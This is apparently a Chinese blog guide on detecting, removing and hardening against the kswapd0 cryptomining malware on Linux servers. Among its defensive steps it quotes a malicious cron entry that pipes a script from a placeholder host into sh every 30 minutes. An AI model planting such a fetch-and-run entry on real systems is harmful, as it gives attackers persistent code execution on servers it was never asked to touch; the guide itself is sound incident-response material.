1. 初识kswapd0挖矿病毒一场突如其来的CPU风暴那天早上我刚打开监控系统阿里云的告警短信就跳了出来——某台测试服务器的CPU使用率飙到了95%以上。登录服务器执行top命令后一个陌生的kswapd0进程赫然显示在资源占用榜首。这个本该负责内存交换的内核进程此刻却像脱缰野马般吞噬着CPU资源。典型症状自查清单top命令显示异常高的CPU占用通常80%进程名可能是kswapd0、kauditd0等变种伴随出现陌生用户如test、vagrant阿里云/腾讯云等平台触发安全告警这个病毒最狡猾之处在于伪装。它冒用系统进程名称普通运维人员很容易误判为正常内存交换。但仔细观察会发现几个破绽正常kswapd0的CPU占用不会持续高于5%且病毒进程往往关联异常IP连接。2. 深度排查揪出隐藏的挖矿元凶2.1 进程定位三板斧首先通过组合命令锁定可疑进程# 查看高CPU进程 top -c | head -20 # 关联网络连接 netstat -natp | grep kswapd0 # 定位进程文件 ls -l /proc/PID/exe在最近处理的案例中病毒文件通常藏在/home/test/.configrc7/a//tmp/.X11-unix//dev/shm/等临时目录病毒文件特征隐藏属性文件名以点开头修改时间为异常时段包含minerd、xmr等字符串文件MD5可在威胁情报平台验证2.2 入侵痕迹追踪检查系统日志发现大量爆破记录grep Failed password /var/log/auth.log more /var/log/secure* | grep Accepted常见入侵路径SSH弱密码爆破如test:123456Redis未授权访问Docker API暴露公网老旧Web应用漏洞3. 彻底清除斩草除根的实战操作3.1 清理病毒服务先停止恶意服务防止复活# 查看服务关联 systemctl status PID # 终止服务 systemctl stop malicious.service # 禁用自启 systemctl disable malicious.service3.2 删除病毒文件使用find命令全网搜捕find / -name kswapd0 2/dev/null # 典型位置处理 rm -rf /home/test/.configrc7 rm -rf /tmp/.X11-unix/.rsync注意删除前建议先备份样本用于分析可使用tar -zcvf malware.tar.gz 路径3.3 清除定时任务病毒常通过cron持久化# 检查系统级任务 cat /etc/crontab # 检查各用户任务 ls /var/spool/cron/ crontab -l -u test发现类似这样的恶意任务要立即删除*/30 * * * * curl -s http://malware.com/x.sh | sh4. 系统加固构建防护体系4.1 基础安全配置# 禁用root远程登录 sed -i s/PermitRootLogin yes/PermitRootLogin no/ /etc/ssh/sshd_config # 启用防火墙 systemctl enable firewalld firewall-cmd --add-port22/tcp --permanent # 安装入侵检测 yum install aide -y aide --init4.2 持续监控方案建议部署文件监控auditd监控敏感目录auditctl -w /etc/passwd -p wa -k user_change进程监控编写检测脚本#!/bin/bash if ps aux | grep -q [k]swapd0; then echo [$(date)] 发现可疑进程 /var/log/security_monitor.log fi网络监控iftop观察异常连接5. 应急响应备忘录发现入侵后必须检查[ ]/etc/passwd新增用户[ ]~/.ssh/authorized_keys异常公钥[ ]ldd检查病毒动态链接库[ ]history查看攻击者操作记录推荐工具包病毒检测ClamAV、rkhunter网络分析tcpdump、Wireshark样本分析strace、ltrace记得最后一定要修改所有账号密码特别是曾经被破解的test用户。我在某次处理中就遇到过攻击者在/etc/profile里埋了后门脚本即使清除了病毒文件重启后又会从远程下载新的恶意程序。